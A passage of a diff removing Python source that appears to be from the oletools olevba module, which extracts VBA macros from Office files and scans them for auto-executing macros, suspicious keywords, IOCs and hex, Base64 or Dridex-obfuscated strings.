- # print 'VBA EXPRESSION: encoded=%r => decoded=%r' % (encoded, decoded)
- # remove parentheses and quotes from original string:
- # if encoded.startswith('(') and encoded.endswith(')'):
- # encoded = encoded[1:-1]
- # if encoded.startswith('"') and encoded.endswith('"'):
- # encoded = encoded[1:-1]
- # avoid duplicates and simple strings:
- if encoded not in found and decoded != encoded:
- results.append((encoded, decoded))
- found.add(encoded)
- # else:
- # print 'VBA STRING: encoded=%r => decoded=%r' % (encoded, decoded)
- return results
-
-
-def json2ascii(json_obj, encoding='utf8', errors='replace'):
- """ ensure there is no unicode in json and all strings are safe to decode
-
- works recursively, decodes and re-encodes every string to/from unicode
- to ensure there will be no trouble in loading the dumped json output
- """
- if json_obj is None:
- pass
- elif isinstance(json_obj, (bool, int, float)):
- pass
- elif isinstance(json_obj, str):
- # de-code and re-encode
- dencoded = json_obj
- if dencoded != json_obj:
- log.debug('json2ascii: replaced: {0} (len {1})'
- .format(json_obj, len(json_obj)))
- log.debug('json2ascii: with: {0} (len {1})'
- .format(dencoded, len(dencoded)))
- return dencoded
- elif isinstance(json_obj, bytes):
- log.debug('json2ascii: encode unicode: {0}'
- .format(json_obj.decode(encoding, errors)))
- # cannot put original into logger
- # print 'original: ' json_obj
- return json_obj.decode(encoding, errors)
- elif isinstance(json_obj, dict):
- for key in json_obj:
- json_obj[key] = json2ascii(json_obj[key])
- elif isinstance(json_obj, (list,tuple)):
- for item in json_obj:
- item = json2ascii(item)
- else:
- log.debug('unexpected type in json2ascii: {0} -- leave as is'
- .format(type(json_obj)))
- return json_obj
-
-
-_have_printed_json_start = False
-
-def print_json(json_dict=None, _json_is_last=False, **json_parts):
- """ line-wise print of json.dumps(json2ascii(..)) with options and indent+1
-
- can use in two ways:
- (1) print_json(some_dict)
- (2) print_json(key1=value1, key2=value2, ...)
-
- :param bool _json_is_last: set to True only for very last entry to complete
- the top-level json-list
- """
- global _have_printed_json_start
-
- if json_dict and json_parts:
- raise ValueError('Invalid json argument: want either single dict or '
- 'key=value parts but got both)')
- elif (json_dict is not None) and (not isinstance(json_dict, dict)):
- raise ValueError('Invalid json argument: want either single dict or '
- 'key=value parts but got {0} instead of dict)'
- .format(type(json_dict)))
- if json_parts:
- json_dict = json_parts
-
- if not _have_printed_json_start:
- print('[')
- _have_printed_json_start = True
-
- lines = json.dumps(json2ascii(json_dict), check_circular=False,
- indent=4, ensure_ascii=False).splitlines()
- for line in lines[:-1]:
- print(' {0}'.format(line))
- if _json_is_last:
- print(' {0}'.format(lines[-1])) # print last line without comma
- print(']')
- else:
- print(' {0},'.format(lines[-1])) # print last line with comma
-
-
-class VBA_Scanner(object):
- """
- Class to scan the source code of a VBA module to find obfuscated strings,
- suspicious keywords, IOCs, auto-executable macros, etc.
- """
-
- def __init__(self, vba_code):
- """
- VBA_Scanner constructor
-
- :param vba_code: str, VBA source code to be analyzed
- """
- if isinstance(vba_code, bytes):
- vba_code = vba_code.decode('utf-8', 'backslashreplace')
- # join long lines ending with " _":
- self.code = vba_collapse_long_lines(vba_code)
- self.code_hex = ''
- self.code_hex_rev = ''
- self.code_rev_hex = ''
- self.code_base64 = ''
- self.code_dridex = ''
- self.code_vba = ''
- self.strReverse = None
- # results = None before scanning, then a list of tuples after scanning
- self.results = None
- self.autoexec_keywords = None
- self.suspicious_keywords = None
- self.iocs = None
- self.hex_strings = None
- self.base64_strings = None
- self.dridex_strings = None
- self.vba_strings = None
-
-
- def scan(self, include_decoded_strings=False, deobfuscate=False):
- """
- Analyze the provided VBA code to detect suspicious keywords,
- auto-executable macros, IOC patterns, obfuscation patterns
- such as hex-encoded strings.
-
- :param include_decoded_strings: bool, if True, all encoded strings will be included with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- :return: list of tuples (type, keyword, description)
- (type = 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String')
- """
- # First, detect and extract hex-encoded strings:
- self.hex_strings = detect_hex_strings(self.code)
- # detect if the code contains StrReverse:
- self.strReverse = False
- if 'strreverse' in self.code.lower(): self.strReverse = True
- # Then append the decoded strings to the VBA code, to detect obfuscated IOCs and keywords:
- for encoded, decoded in self.hex_strings:
- self.code_hex += '\n' + decoded
- # if the code contains "StrReverse", also append the hex strings in reverse order:
- if self.strReverse:
- # StrReverse after hex decoding:
- self.code_hex_rev += '\n' + decoded[::-1]
- # StrReverse before hex decoding:
- self.code_rev_hex += '\n' + str(binascii.unhexlify(encoded[::-1]))
- #example: https://malwr.com/analysis/NmFlMGI4YTY1YzYyNDkwNTg1ZTBiZmY5OGI3YjlhYzU/
- #TODO: also append the full code reversed if StrReverse? (risk of false positives?)
- # Detect Base64-encoded strings
- self.base64_strings = detect_base64_strings(self.code)
- for encoded, decoded in self.base64_strings:
- self.code_base64 += '\n' + decoded
- # Detect Dridex-encoded strings
- self.dridex_strings = detect_dridex_strings(self.code)
- for encoded, decoded in self.dridex_strings:
- self.code_dridex += '\n' + decoded
- # Detect obfuscated strings in VBA expressions
- if deobfuscate:
- self.vba_strings = detect_vba_strings(self.code)
- else:
- self.vba_strings = []
- for encoded, decoded in self.vba_strings:
- self.code_vba += '\n' + decoded
- results = []
- self.autoexec_keywords = []
- self.suspicious_keywords = []
- self.iocs = []
-
- for code, obfuscation in (
- (self.code, None),
- (self.code_hex, 'Hex'),
- (self.code_hex_rev, 'Hex+StrReverse'),
- (self.code_rev_hex, 'StrReverse+Hex'),
- (self.code_base64, 'Base64'),
- (self.code_dridex, 'Dridex'),
- (self.code_vba, 'VBA expression'),
- ):
- if isinstance(code,bytes):
- code=code.decode('utf-8','backslashreplace')
- self.autoexec_keywords += detect_autoexec(code, obfuscation)
- self.suspicious_keywords += detect_suspicious(code, obfuscation)
- self.iocs += detect_patterns(code, obfuscation)
-
- # If hex-encoded strings were discovered, add an item to suspicious keywords:
- if self.hex_strings:
- self.suspicious_keywords.append(('Hex Strings',
- 'Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)'))
- if self.base64_strings:
- self.suspicious_keywords.append(('Base64 Strings',
- 'Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)'))
- if self.dridex_strings:
- self.suspicious_keywords.append(('Dridex Strings',
- 'Dridex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)'))
- if self.vba_strings:
- self.suspicious_keywords.append(('VBA obfuscated Strings',
- 'VBA string expressions were detected, may be used to obfuscate strings (option --decode to see all)'))
- # use a set to avoid duplicate keywords
- keyword_set = set()
- for keyword, description in self.autoexec_keywords:
- if keyword not in keyword_set:
- results.append(('AutoExec', keyword, description))
- keyword_set.add(keyword)
- keyword_set = set()
- for keyword, description in self.suspicious_keywords:
- if keyword not in keyword_set:
- results.append(('Suspicious', keyword, description))
- keyword_set.add(keyword)
- keyword_set = set()
- for pattern_type, value in self.iocs:
- if value not in keyword_set:
- results.append(('IOC', value, pattern_type))
- keyword_set.add(value)
-
- # include decoded strings only if they are printable or if --decode option:
- for encoded, decoded in self.hex_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('Hex String', decoded, encoded))
- for encoded, decoded in self.base64_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('Base64 String', decoded, encoded))
- for encoded, decoded in self.dridex_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('Dridex string', decoded, encoded))
- for encoded, decoded in self.vba_strings:
- if include_decoded_strings or is_printable(decoded):
- results.append(('VBA string', decoded, encoded))
- self.results = results
- return results
-
- def scan_summary(self):
- """
- Analyze the provided VBA code to detect suspicious keywords,
- auto-executable macros, IOC patterns, obfuscation patterns
- such as hex-encoded strings.
-
- :return: tuple with the number of items found for each category:
- (autoexec, suspicious, IOCs, hex, base64, dridex, vba)
- """
- # avoid scanning the same code twice:
- if self.results is None:
- self.scan()
- return (len(self.autoexec_keywords), len(self.suspicious_keywords),
- len(self.iocs), len(self.hex_strings), len(self.base64_strings),
- len(self.dridex_strings), len(self.vba_strings))
-
-
-def scan_vba(vba_code, include_decoded_strings, deobfuscate=False):
- """
- Analyze the provided VBA code to detect suspicious keywords,
- auto-executable macros, IOC patterns, obfuscation patterns
- such as hex-encoded strings.
- (shortcut for VBA_Scanner(vba_code).scan())
-
- :param vba_code: str, VBA source code to be analyzed
- :param include_decoded_strings: bool, if True all encoded strings will be included with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- :return: list of tuples (type, keyword, description)
- (type = 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String')
- """
- return VBA_Scanner(vba_code).scan(include_decoded_strings, deobfuscate)
-
-
-#=== CLASSES =================================================================
-
-class VBA_Parser(object):
- """
- Class to parse MS Office files, to detect VBA macros and extract VBA source code
- Supported file formats:
- - Word 97-2003 (.doc, .dot)
- - Word 2007+ (.docm, .dotm)
- - Word 2003 XML (.xml)
- - Word MHT - Single File Web Page / MHTML (.mht)
- - Excel 97-2003 (.xls)
- - Excel 2007+ (.xlsm, .xlsb)
- - PowerPoint 97-2003 (.ppt)
- - PowerPoint 2007+ (.pptm, .ppsm)
- """
-
- def __init__(self, filename, data=None, container=None, relaxed=False):
- """
- Constructor for VBA_Parser
-
- :param filename: filename or path of file to parse, or file-like object
-
- :param data: None or bytes str, if None the file will be read from disk (or from the file-like object).
- If data is provided as a bytes string, it will be parsed as the content of the file in memory,
- and not read from disk. Note: files must be read in binary mode, i.e. open(f, 'rb').
-
- :param container: str, path and filename of container if the file is within
- a zip archive, None otherwise.
-
- :param relaxed: if True, treat mal-formed documents and missing streams more like MS office:
- do nothing; if False (default), raise errors in these cases
-
- raises a FileOpenError if all attemps to interpret the data header failed
- """
- #TODO: filename should only be a string, data should be used for the file-like object
- #TODO: filename should be mandatory, optional data is a string or file-like object
- #TODO: also support olefile and zipfile as input
- if data is None:
- # open file from disk:
- _file = filename
- else:
- # file already read in memory, make it a file-like object for zipfile:
- _file = BytesIO(data)
- #self.file = _file
- self.ole_file = None
- self.ole_subfiles = []
- self.filename = filename
- self.container = container
- self.relaxed = relaxed
- self.type = None
- self.vba_projects = None
- self.vba_forms = None
- self.contains_macros = None # will be set to True or False by detect_macros
- self.vba_code_all_modules = None # to store the source code of all modules
- # list of tuples for each module: (subfilename, stream_path, vba_filename, vba_code)
- self.modules = None
- # Analysis results: list of tuples (type, keyword, description) - See VBA_Scanner
- self.analysis_results = None
- # statistics for the scan summary and flags
- self.nb_macros = 0
- self.nb_autoexec = 0
- self.nb_suspicious = 0
- self.nb_iocs = 0
- self.nb_hexstrings = 0
- self.nb_base64strings = 0
- self.nb_dridexstrings = 0
- self.nb_vbastrings = 0
-
- # if filename is None:
- # if isinstance(_file, basestring):
- # if len(_file) < olefile.MINIMAL_OLEFILE_SIZE:
- # self.filename = _file
- # else:
- # self.filename = ''
- # else:
- # self.filename = ''
- if olefile.isOleFile(_file):
- # This looks like an OLE file
- self.open_ole(_file)
-
- # if this worked, try whether it is a ppt file (special ole file)
- self.open_ppt()
- if self.type is None and is_zipfile(_file):
- # Zip file, which may be an OpenXML document
- self.open_openxml(_file)
- if self.type is None:
- # read file from disk, check if it is a Word 2003 XML file (WordProcessingML), Excel 2003 XML,
- # or a plain text file containing VBA code
- if data is None:
- data = open(filename, 'rb').read()
- # check if it is a Word 2003 XML file (WordProcessingML): must contain the namespace
- if b'http://schemas.microsoft.com/office/word/2003/wordml' in data:
- self.open_word2003xml(data)
- # store a lowercase version for the next tests:
- data_lowercase = data.lower()
- # check if it is a MHT file (MIME HTML, Word or Excel saved as "Single File Web Page"):
- # According to my tests, these files usually start with "MIME-Version: 1.0" on the 1st line
- # BUT Word accepts a blank line or other MIME headers inserted before,
- # and even whitespaces in between "MIME", "-", "Version" and ":". The version number is ignored.
- # And the line is case insensitive.
- # so we'll just check the presence of mime, version and multipart anywhere:
- if self.type is None and b'mime' in data_lowercase and b'version' in data_lowercase \
- and b'multipart' in data_lowercase:
- self.open_mht(data)
- #TODO: handle exceptions
- #TODO: Excel 2003 XML
- # Check if this is a plain text VBA or VBScript file:
- # To avoid scanning binary files, we simply check for some control chars:
- if self.type is None and b'\x00' not in data:
- self.open_text(data)
- if self.type is None:
- # At this stage, could not match a known format:
- msg = '%s is not a supported file type, cannot extract VBA Macros.' % self.filename
- log.info(msg)
- raise FileOpenError(msg)
-
- def open_ole(self, _file):
- """
- Open an OLE file
- :param _file: filename or file contents in a file object
- :return: nothing
- """
- log.info('Opening OLE file %s' % self.filename)
- try:
- # Open and parse the OLE file, using unicode for path names:
- self.ole_file = olefile.OleFileIO(_file, path_encoding=None)
- # set type only if parsing succeeds
- self.type = TYPE_OLE
- except (IOError, TypeError, ValueError) as exc:
- # TODO: handle OLE parsing exceptions
- log.info('Failed OLE parsing for file %r (%s)' % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
-
-
- def open_openxml(self, _file):
- """
- Open an OpenXML file
- :param _file: filename or file contents in a file object
- :return: nothing
- """
- # This looks like a zip file, need to look for vbaProject.bin inside
- # It can be any OLE file inside the archive
- #...because vbaProject.bin can be renamed:
- # see http://www.decalage.info/files/JCV07_Lagadec_OpenDocument_OpenXML_v4_decalage.pdf#page=18
- log.info('Opening ZIP/OpenXML file %s' % self.filename)
- try:
- z = zipfile.ZipFile(_file)
- #TODO: check if this is actually an OpenXML file
- #TODO: if the zip file is encrypted, suggest to use the -z option, or try '-z infected' automatically
- # check each file within the zip if it is an OLE file, by reading its magic:
- for subfile in z.namelist():
- magic = z.open(subfile).read(len(olefile.MAGIC))
- if magic == olefile.MAGIC:
- log.debug('Opening OLE file %s within zip' % subfile)
- ole_data = z.open(subfile).read()
- try:
- self.ole_subfiles.append(
- VBA_Parser(filename=subfile, data=ole_data,
- relaxed=self.relaxed))
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('%s is not a valid OLE file (%s)' % (subfile, exc))
- log.debug('Trace:', exc_info=True)
- continue
- else:
- raise SubstreamOpenError(self.filename, subfile,
- exc)
- z.close()
- # set type only if parsing succeeds
- self.type = TYPE_OpenXML
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('Error {0} caught in Zip/OpenXML parsing for file {1}'
- .format(exc, self.filename))
- log.debug('Trace:', exc_info=True)
- else:
- raise
- except (RuntimeError, zipfile.BadZipfile, zipfile.LargeZipFile, IOError) as exc:
- # TODO: handle parsing exceptions
- log.info('Failed Zip/OpenXML parsing for file %r (%s)'
- % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
-
- def open_word2003xml(self, data):
- """
- Open a Word 2003 XML file
- :param data: file contents in a string or bytes
- :return: nothing
- """
- log.info('Opening Word 2003 XML file %s' % self.filename)
- try:
- # parse the XML content
- # TODO: handle XML parsing exceptions
- et = ET.fromstring(data)
- # find all the binData elements:
- for bindata in et.getiterator(TAG_BINDATA):
- # the binData content is an OLE container for the VBA project, compressed
- # using the ActiveMime/MSO format (zlib-compressed), and Base64 encoded.
- # get the filename:
- fname = bindata.get(ATTR_NAME, 'noname.mso')
- # decode the base64 activemime
- mso_data = binascii.a2b_base64(bindata.text)
- if is_mso_file(mso_data):
- # decompress the zlib data stored in the MSO file, which is the OLE container:
- # TODO: handle different offsets => separate function
- try:
- ole_data = mso_file_extract(mso_data)
- self.ole_subfiles.append(
- VBA_Parser(filename=fname, data=ole_data,
- relaxed=self.relaxed))
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('Error parsing subfile {0}: {1}'
- .format(fname, exc))
- log.debug('Trace:', exc_info=True)
- else:
- raise SubstreamOpenError(self.filename, fname, exc)
- else:
- log.info('%s is not a valid MSO file' % fname)
- # set type only if parsing succeeds
- self.type = TYPE_Word2003_XML
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('Failed XML parsing for file %r (%s)' % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
- else:
- raise
- except Exception as exc:
- # TODO: differentiate exceptions for each parsing stage
- # (but ET is different libs, no good exception description in API)
- # found: XMLSyntaxError
- log.info('Failed XML parsing for file %r (%s)' % (self.filename, exc))
- log.debug('Trace:', exc_info=True)
-
- def open_mht(self, data):
- """
- Open a MHTML file
- :param data: file contents in a string or bytes
- :return: nothing
- """
- log.info('Opening MHTML file %s' % self.filename)
- try:
- if isinstance(data,bytes):
- data = data.decode('utf8', 'backslashreplace')
- # parse the MIME content
- # remove any leading whitespace or newline (workaround for issue in email package)
- stripped_data = data.lstrip('\r\n\t ')
- # strip any junk from the beginning of the file
- # (issue #31 fix by Greg C - gdigreg)
- # TODO: improve keywords to avoid false positives
- mime_offset = stripped_data.find('MIME')
- content_offset = stripped_data.find('Content')
- # if "MIME" is found, and located before "Content":
- if -1 < mime_offset <= content_offset:
- stripped_data = stripped_data[mime_offset:]
- # else if "Content" is found, and before "MIME"
- # TODO: can it work without "MIME" at all?
- elif content_offset > -1:
- stripped_data = stripped_data[content_offset:]
- # TODO: quick and dirty fix: insert a standard line with MIME-Version header?
- mhtml = email.message_from_string(stripped_data)
- # find all the attached files:
- for part in mhtml.walk():
- content_type = part.get_content_type() # always returns a value
- fname = part.get_filename(None) # returns None if it fails
- # TODO: get content-location if no filename
- log.debug('MHTML part: filename=%r, content-type=%r' % (fname, content_type))
- part_data = part.get_payload(decode=True)
- # VBA macros are stored in a binary file named "editdata.mso".
- # the data content is an OLE container for the VBA project, compressed
- # using the ActiveMime/MSO format (zlib-compressed), and Base64 encoded.
- # decompress the zlib data starting at offset 0x32, which is the OLE container:
- # check ActiveMime header:
-
- if (isinstance(part_data, str) or isinstance(part_data, bytes)) and is_mso_file(part_data):
- log.debug('Found ActiveMime header, decompressing MSO container')
- try:
- ole_data = mso_file_extract(part_data)
-
- # TODO: check if it is actually an OLE file
- # TODO: get the MSO filename from content_location?
- self.ole_subfiles.append(
- VBA_Parser(filename=fname, data=ole_data,
- relaxed=self.relaxed))
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('%s does not contain a valid OLE file (%s)'
- % (fname, exc))
- log.debug('Trace:', exc_info=True)
- # TODO: bug here - need to split in smaller functions/classes?
- else:
- raise SubstreamOpenError(self.filename, fname, exc)
- else:
- log.debug('type(part_data) = %s' % type(part_data))
- try:
- log.debug('part_data[0:20] = %r' % part_data[0:20])
- except TypeError as err:
- log.debug('part_data has no __getitem__')
- # set type only if parsing succeeds
- self.type = TYPE_MHTML
- except OlevbaBaseException:
- raise
- except Exception:
- log.info('Failed MIME parsing for file %r - %s'
- % (self.filename, MSG_OLEVBA_ISSUES))
- log.debug('Trace:', exc_info=True)
-
- def open_ppt(self):
- """ try to interpret self.ole_file as PowerPoint 97-2003 using PptParser
-
- Although self.ole_file is a valid olefile.OleFileIO, we set
- self.ole_file = None in here and instead set self.ole_subfiles to the
- VBA ole streams found within the main ole file. That makes most of the
- code below treat this like an OpenXML file and only look at the
- ole_subfiles (except find_vba_* which needs to explicitly check for
- self.type)
- """
-
- log.info('Check whether OLE file is PPT')
- ppt_parser.enable_logging()
- try:
- ppt = ppt_parser.PptParser(self.ole_file, fast_fail=True)
- for vba_data in ppt.iter_vba_data():
- self.ole_subfiles.append(VBA_Parser(None, vba_data,
- container='PptParser'))
- log.info('File is PPT')
- self.ole_file.close() # just in case
- self.ole_file = None # required to make other methods look at ole_subfiles
- self.type = TYPE_PPT
- except Exception as exc:
- if self.container == 'PptParser':
- # this is a subfile of a ppt --> to be expected that is no ppt
- log.debug('PPT subfile is not a PPT file')
- else:
- log.debug("File appears not to be a ppt file (%s)" % exc)
-
-
- def open_text(self, data):
- """
- Open a text file containing VBA or VBScript source code
- :param data: file contents in a string or bytes
- :return: nothing
- """
- log.info('Opening text file %s' % self.filename)
- # directly store the source code:
- if isinstance(data,bytes):
- data=data.decode('utf8','backslashreplace')
- self.vba_code_all_modules = data
- self.contains_macros = True
- # set type only if parsing succeeds
- self.type = TYPE_TEXT
-
-
- def find_vba_projects(self):
- """
- Finds all the VBA projects stored in an OLE file.
-
- Return None if the file is not OLE but OpenXML.
- Return a list of tuples (vba_root, project_path, dir_path) for each VBA project.
- vba_root is the path of the root OLE storage containing the VBA project,
- including a trailing slash unless it is the root of the OLE file.
- project_path is the path of the OLE stream named "PROJECT" within the VBA project.
- dir_path is the path of the OLE stream named "VBA/dir" within the VBA project.
-
- If this function returns an empty list for one of the supported formats
- (i.e. Word, Excel, Powerpoint), then the file does not contain VBA macros.
-
- :return: None if OpenXML file, list of tuples (vba_root, project_path, dir_path)
- for each VBA project found if OLE file
- """
- log.debug('VBA_Parser.find_vba_projects')
-
- # if the file is not OLE but OpenXML, return None:
- if self.ole_file is None and self.type != TYPE_PPT:
- return None
-
- # if this method has already been called, return previous result:
- if self.vba_projects is not None:
- return self.vba_projects
-
- # if this is a ppt file (PowerPoint 97-2003):
- # self.ole_file is None but the ole_subfiles do contain vba_projects
- # (like for OpenXML files).
- if self.type == TYPE_PPT:
- # TODO: so far, this function is never called for PPT files, but
- # if that happens, the information is lost which ole file contains
- # which storage!
- log.warning('Returned info is not complete for PPT types!')
- self.vba_projects = []
- for subfile in self.ole_subfiles:
- self.vba_projects.extend(subfile.find_vba_projects())
- return self.vba_projects
-
- # Find the VBA project root (different in MS Word, Excel, etc):
- # - Word 97-2003: Macros
- # - Excel 97-2003: _VBA_PROJECT_CUR
- # - PowerPoint 97-2003: PptParser has identified ole_subfiles
- # - Word 2007+: word/vbaProject.bin in zip archive, then the VBA project is the root of vbaProject.bin.
- # - Excel 2007+: xl/vbaProject.bin in zip archive, then same as Word
- # - PowerPoint 2007+: ppt/vbaProject.bin in zip archive, then same as Word
- # - Visio 2007: not supported yet (different file structure)
-
- # According to MS-OVBA section 2.2.1:
- # - the VBA project root storage MUST contain a VBA storage and a PROJECT stream
- # - The root/VBA storage MUST contain a _VBA_PROJECT stream and a dir stream
- # - all names are case-insensitive
-
- def check_vba_stream(ole, vba_root, stream_path):
- full_path = vba_root + stream_path
- if ole.exists(full_path) and ole.get_type(full_path) == olefile.STGTY_STREAM:
- log.debug('Found %s stream: %s' % (stream_path, full_path))
- return full_path
- else:
- log.debug('Missing %s stream, this is not a valid VBA project structure' % stream_path)
- return False
-
- # start with an empty list:
- self.vba_projects = []
- # Look for any storage containing those storage/streams:
- ole = self.ole_file
- for storage in ole.listdir(streams=False, storages=True):
- log.debug('Checking storage %r' % storage)
- # Look for a storage ending with "VBA":
- if storage[-1].upper() == 'VBA':
- log.debug('Found VBA storage: %s' % ('/'.join(storage)))
- vba_root = '/'.join(storage[:-1])
- # Add a trailing slash to vba_root, unless it is the root of the OLE file:
- # (used later to append all the child streams/storages)
- if vba_root != '':
- vba_root += '/'
- log.debug('Checking vba_root="%s"' % vba_root)
-
- # Check if the VBA root storage also contains a PROJECT stream:
- project_path = check_vba_stream(ole, vba_root, 'PROJECT')
- if not project_path: continue
- # Check if the VBA root storage also contains a VBA/_VBA_PROJECT stream:
- vba_project_path = check_vba_stream(ole, vba_root, 'VBA/_VBA_PROJECT')
- if not vba_project_path: continue
- # Check if the VBA root storage also contains a VBA/dir stream:
- dir_path = check_vba_stream(ole, vba_root, 'VBA/dir')
- if not dir_path: continue
- # Now we are pretty sure it is a VBA project structure
- log.debug('VBA root storage: "%s"' % vba_root)
- # append the results to the list as a tuple for later use:
- self.vba_projects.append((vba_root, project_path, dir_path))
- return self.vba_projects
-
- def detect_vba_macros(self):
- """
- Detect the potential presence of VBA macros in the file, by checking
- if it contains VBA projects. Both OLE and OpenXML files are supported.
-
- Important: for now, results are accurate only for Word, Excel and PowerPoint
-
- Note: this method does NOT attempt to check the actual presence or validity
- of VBA macro source code, so there might be false positives.
- It may also detect VBA macros in files embedded within the main file,
- for example an Excel workbook with macros embedded into a Word
- document without macros may be detected, without distinction.
-
- :return: bool, True if at least one VBA project has been found, False otherwise
- """
- #TODO: return None or raise exception if format not supported
- #TODO: return the number of VBA projects found instead of True/False?
- # if this method was already called, return the previous result:
- if self.contains_macros is not None:
- return self.contains_macros
- # if OpenXML/PPT, check all the OLE subfiles:
- if self.ole_file is None:
- for ole_subfile in self.ole_subfiles:
- if ole_subfile.detect_vba_macros():
- self.contains_macros = True
- return True
- # otherwise, no macro found:
- self.contains_macros = False
- return False
- # otherwise it's an OLE file, find VBA projects:
- vba_projects = self.find_vba_projects()
- if len(vba_projects) == 0:
- self.contains_macros = False
- else:
- self.contains_macros = True
- # Also look for VBA code in any stream including orphans
- # (happens in some malformed files)
- ole = self.ole_file
- for sid in xrange(len(ole.direntries)):
- # check if id is already done above:
- log.debug('Checking DirEntry #%d' % sid)
- d = ole.direntries[sid]
- if d is None:
- # this direntry is not part of the tree: either unused or an orphan
- d = ole._load_direntry(sid)
- log.debug('This DirEntry is an orphan or unused')
- if d.entry_type == olefile.STGTY_STREAM:
- # read data
- log.debug('Reading data from stream %r - size: %d bytes' % (d.name, d.size))
- try:
- data = ole._open(d.isectStart, d.size).read()
- log.debug('Read %d bytes' % len(data))
- if len(data) > 200:
- log.debug('%r...[much more data]...%r' % (data[:100], data[-50:]))
- else:
- log.debug(repr(data))
- if 'Attribut' in data.decode('utf-8', 'ignore'):
- log.debug('Found VBA compressed code')
- self.contains_macros = True
- except IOError as exc:
- if self.relaxed:
- log.info('Error when reading OLE Stream %r' % d.name)
- log.debug('Trace:', exc_trace=True)
- else:
- raise SubstreamOpenError(self.filename, d.name, exc)
- return self.contains_macros
-
- def extract_macros(self):
- """
- Extract and decompress source code for each VBA macro found in the file
-
- Iterator: yields (filename, stream_path, vba_filename, vba_code) for each VBA macro found
- If the file is OLE, filename is the path of the file.
- If the file is OpenXML, filename is the path of the OLE subfile containing VBA macros
- within the zip archive, e.g. word/vbaProject.bin.
- If the file is PPT, result is as for OpenXML but filename is useless
- """
- log.debug('extract_macros:')
- if self.ole_file is None:
- # This may be either an OpenXML/PPT or a text file:
- if self.type == TYPE_TEXT:
- # This is a text file, yield the full code:
- yield (self.filename, '', self.filename, self.vba_code_all_modules)
- else:
- # OpenXML/PPT: recursively yield results from each OLE subfile:
- for ole_subfile in self.ole_subfiles:
- for results in ole_subfile.extract_macros():
- yield results
- else:
- # This is an OLE file:
- self.find_vba_projects()
- # set of stream ids
- vba_stream_ids = set()
- for vba_root, project_path, dir_path in self.vba_projects:
- # extract all VBA macros from that VBA root storage:
- for stream_path, vba_filename, vba_code in \
- _extract_vba(self.ole_file, vba_root, project_path,
- dir_path, self.relaxed):
- # store direntry ids in a set:
- vba_stream_ids.add(self.ole_file._find(stream_path))
- yield (self.filename, stream_path, vba_filename, vba_code)
- # Also look for VBA code in any stream including orphans
- # (happens in some malformed files)
- ole = self.ole_file
- for sid in xrange(len(ole.direntries)):
- # check if id is already done above:
- log.debug('Checking DirEntry #%d' % sid)
- if sid in vba_stream_ids:
- log.debug('Already extracted')
- continue
- d = ole.direntries[sid]
- if d is None:
- # this direntry is not part of the tree: either unused or an orphan
- d = ole._load_direntry(sid)
- log.debug('This DirEntry is an orphan or unused')
- if d.entry_type == olefile.STGTY_STREAM:
- # read data
- log.debug('Reading data from stream %r' % d.name)
- data = ole._open(d.isectStart, d.size).read()
- for match in re.finditer(b'\\x00Attribut[^e]', data, flags=re.IGNORECASE):
- start = match.start() - 3
- log.debug('Found VBA compressed code at index %X' % start)
- compressed_code = data[start:]
- try:
- vba_code = decompress_stream(compressed_code)
- yield (self.filename, d.name, d.name, vba_code)
- except Exception as exc:
- # display the exception with full stack trace for debugging
- log.debug('Error processing stream %r in file %r (%s)' % (d.name, self.filename, exc))
- log.debug('Traceback:', exc_info=True)
- # do not raise the error, as it is unlikely to be a compressed macro stream
-
- def extract_all_macros(self):
- """
- Extract and decompress source code for each VBA macro found in the file
- by calling extract_macros(), store the results as a list of tuples
- (filename, stream_path, vba_filename, vba_code) in self.modules.
- See extract_macros for details.
- """
- if self.modules is None:
- self.modules = []
- for (subfilename, stream_path, vba_filename, vba_code) in self.extract_macros():
- self.modules.append((subfilename, stream_path, vba_filename, vba_code))
- self.nb_macros = len(self.modules)
- return self.modules
-
-
-
- def analyze_macros(self, show_decoded_strings=False, deobfuscate=False):
- """
- runs extract_macros and analyze the source code of all VBA macros
- found in the file.
- """
- if self.detect_vba_macros():
- # if the analysis was already done, avoid doing it twice:
- if self.analysis_results is not None:
- return self.analysis_results
- # variable to merge source code from all modules:
- if self.vba_code_all_modules is None:
- self.vba_code_all_modules = ''
- for (_, _, _, vba_code) in self.extract_all_macros():
- #TODO: filter code? (each module)
- self.vba_code_all_modules += vba_code.decode('utf-8', 'ignore') + '\n'
- for (_, _, form_string) in self.extract_form_strings():
- self.vba_code_all_modules += form_string.decode('utf-8', 'ignore') + '\n'
- # Analyze the whole code at once:
- scanner = VBA_Scanner(self.vba_code_all_modules)
- self.analysis_results = scanner.scan(show_decoded_strings, deobfuscate)
- autoexec, suspicious, iocs, hexstrings, base64strings, dridex, vbastrings = scanner.scan_summary()
- self.nb_autoexec += autoexec
- self.nb_suspicious += suspicious
- self.nb_iocs += iocs
- self.nb_hexstrings += hexstrings
- self.nb_base64strings += base64strings
- self.nb_dridexstrings += dridex
- self.nb_vbastrings += vbastrings
-
- return self.analysis_results
-
-
- def reveal(self):
- # we only want printable strings:
- analysis = self.analyze_macros(show_decoded_strings=False)
- # to avoid replacing short strings contained into longer strings, we sort the analysis results
- # based on the length of the encoded string, in reverse order:
- analysis = sorted(analysis, key=lambda type_decoded_encoded: len(type_decoded_encoded[2]), reverse=True)
- # normally now self.vba_code_all_modules contains source code from all modules
- deobf_code = self.vba_code_all_modules
- for kw_type, decoded, encoded in analysis:
- if kw_type == 'VBA string':
- #print '%3d occurences: %r => %r' % (deobf_code.count(encoded), encoded, decoded)
- # need to add double quotes around the decoded strings
- # after escaping double-quotes as double-double-quotes for VBA:
